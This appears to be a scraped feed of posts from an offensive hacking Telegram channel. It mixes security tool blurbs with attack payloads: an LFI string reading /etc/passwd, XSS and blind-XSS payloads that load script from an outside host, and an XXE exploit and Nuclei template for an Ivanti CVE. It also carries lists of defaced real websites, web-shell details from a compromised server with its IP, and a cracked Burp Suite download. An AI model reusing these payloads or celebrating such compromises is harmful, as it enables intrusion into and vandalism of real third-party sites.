Command Injection Payload List

⬇️ Download

#Payload #Command #Injection
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

☠️ xnLinkFinder v4.4 ☠️

💬
A python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target

📊 This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
⚪️ crawling a target (pass a domain/URL)
⚪️ crawling multiple targets (pass a file of domains/URLs)
⚪️ searching files in a given directory (pass a directory name)
⚪️ get them from a Burp project (pass location of a Burp XML file)
⚪️ get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)
⚪️ get them from a Caido project (pass location of a Caido export CSV file)
⚪️ processing a waymore results directory (searching archived response files from waymore -mode R and also requesting URLs from waymore.txt and the original URLs from index.txt - see waymore README.md)

🔼 Installation:

cd xnLinkFinder
sudo python setup.py install

💻 Usage:

python xnLinkFinder.py --help

📂 Examples:

#specific target
python3 xnLinkFinder.py -i target.com -sf target.com

#list of URLs
python3 xnLinkFinder.py -i target_js.txt -sf target.com

😸 Github

⬇️ Donwload
🔒 BugCod3

#Python #Discover #Endpoints
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

NetProbe: Network Probe

💬
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

📊 Features:
⚪️ Scan for devices on a specified IP address or subnet
⚪️ Display the IP address, MAC address, manufacturer, and device model of discovered devices
⚪️ Live tracking of devices (optional)
⚪️ Save scan results to a file (optional)
⚪️ Filter by manufacturer (e.g., 'Apple') (optional)
⚪️ Filter by IP range (e.g., '192.168.1.0/24') (optional)
⚪️ Scan rate in seconds (default: 5) (optional)

🔼 Installation:

cd NetProbe
pip install -r requirements.txt

💻 Usage:

python3 netprobe.py —help

📂 Example:

python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Network #Scanner #Vulnerability #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://ipebs.in/
https://govacancia.com/
http://rivieravoyages.com/
http://mail.rivieravoyages.com/
https://stavolink.com/
https://tridentresortsholidays.com/
https://deparagon.com/
http://woosquare.deparagon.com/index1707261924.html
http://ebaymasterkey.deparagon.com/
http://masterkey.deparagon.com/
http://multi.deparagon.com/
http://search.deparagon.com/
http://smspress.deparagon.com/

👁‍🗨 Mirror-h

📊 Database (tridentresortsholidays.com)

Country: 🇺🇸🇮🇹

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

PHP: 8.1.27

Safe Mode: OFF

ServerIP: 213.158.95.90 [🇮🇹]

HDD: Total:1536.00 GB
Free:1322.97 GB [86%]

useful:--------------

Downloader: --------------

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: nginx/1.22.0

🔗 Link

Enjoy... ⭐️

#Shell
➖➖➖➖➖➖➖➖➖➖
🔥 0Day.Today
📣 T.me/BugCod3
📣 T.me/LearnExploit

I found a url like this :
https://domain.io/redirect?url=some_base_64_encoded_string

encoded javanoscript:alert("Xss by vikas") to base64 like :
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=

Now the new url is like this :
https://domain.io/redirect?`url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=`

📘 Twitter

#bugbounty #xss #infosec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

ALWAYS test 404 Not Found in Bug Bounties!

🔗 Medium
🔗 Freedium

#Writeup
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👋 LFI Payload 👋

Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#bugbountytips #bugbounty #CyberSecurity
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CVE-2024-22024

XXE on Ivanti Connect Secure

☠️ payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

#bugbountytips #cve #Ivanti
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

JSON Smuggling: A far-fetched intrusion detection evasion technique

🔗 Medium

#infosec #cybersecurity #blueteam
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Nuclei PoC for Ivanti XXE (CVE-2024-22024)

id: CVE-2024-22024

info:
  name: Ivanti Connect Secure - XXE
  author: watchTowr
  severity: high
  denoscription: |
    Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
  reference:
    - https://labs.watchtowr.com/are-we-now-part-of-ivanti/
    - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
  metadata:
    max-request: 1
    vendor: ivanti
    product: "connect_secure"
    shodan-query: "html:\"welcome.cgi?p=logo\""
  tags: cve,cve2024,kev,xxe,ivanti

variables:
  payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
    "http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'

http:
  - raw:
      - |
        POST /dana-na/auth/saml-sso.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SAMLRequest={{base64(payload)}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '/dana-na/'
          - 'WriteCSS'
        condition: and
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950

#Nuclei #Templates #PoC #XXE
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🥩 PDF

#Wordlist #PDF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://www.sergiocardozo.paineladvocacia.com/
http://acesso.paineladvocacia.com/
https://maioranoadvocacia.com/
http://smart.wecaninfotech.com/
https://tropicanarestaurants.com/index.php
https://madein.az/index.html

👁‍🗨 Mirror-h

Country: 🇺🇸🇹🇭

#Deface
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

👑 Empire 👑

💬
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.

📊 Features:
⚪️ Server/Client Architecture for Multiplayer Support
⚪️ Supports GUI & CLI Clients
⚪️ Fully encrypted communications
⚪️ HTTP/S, Malleable HTTP, OneDrive, Dropbox, and PHP Listeners
⚪️ Massive library (400+) of supported tools in PowerShell, C#, & Python
⚪️ Donut Integration for shellcode generation
⚪️ Modular plugin interface for custom server features
⚪️ Flexible module interface for adding new tools
⚪️ Integrated obfuscation using ConfuserEx 2 & Invoke-Obfuscation
⚪️ In-memory .NET assembly execution
⚪️ Customizable Bypasses
⚪️ JA3/S and JARM Evasion
⚪️ MITRE ATT&CK Integration
⚪️ Integrated Roslyn compiler (Thanks to Covenant)
⚪️ Docker, Kali, ParrotOS, Ubuntu 20.04/22.04, and Debian 10/11/12 Install Support

🔼 Install:

cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh

😸 Github

#Hacktoberfest #C2 #Redteam #Infrastructure
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

Adding 2 new blind XSS payloads to the XSS scanner payload vault 😎

'"><Svg Src=//{CANARY_TOKEN}/s OnLoad=import(this.getAttribute('src')+0)>

AND

'"><Img Src=//{CANARY_TOKEN}/x Onload=import(src+0)>

#XSS #Bugbounty #Tip
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Linux for Hackers: LINUX commands you need to know

⬇️ Download

#linux #hacker #video
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

👁 Burpsuite Pro 👁

🔥 v2024.1.1.1

🔔 BurpBountyPro_v2.8.0 ➕

📂 README (en+ru) included, plz read it before run BS.

🔼 Run with Java 18 (JDK for Win included)

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://tysonmcguffin.com/index.html
https://bilberrybears.com/
https://flighttouch.com/
https://www.cameratouch.flighttouch.com/
https://mail.flighttouch.com/

👁‍🗨 Mirror-h

Country: 🇺🇸🇪🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

✅ H1 asset fetcher ✅

💬
This h1finder.sh is noscript which collect all program names and then collect all assets and save it into wild and non-wild domains

You can get your API key from 👉HackerOne👈

🔼 Installation:

cd h1-asset-fetcher
chmod +x h1finder
mv h1finder /usr/bin/

💻 Usage:

h1finder -t <token> -u <username> -b <true/false>

⚪️ -t = H1 token
⚪️ -u = h1 username
⚪️ -b = true or false, if you want bounty only target set it to true if you want vdp only set it to false

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #Tips #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

‼️ PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks <= 1.9.6 CVSS 9.8 ‼️

Query Fofa: body="/wp-content/themes/bricks/"

📞 PoC
🌐 Nuclei Template

#BugBounty #Tips #Nuclei #Template
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3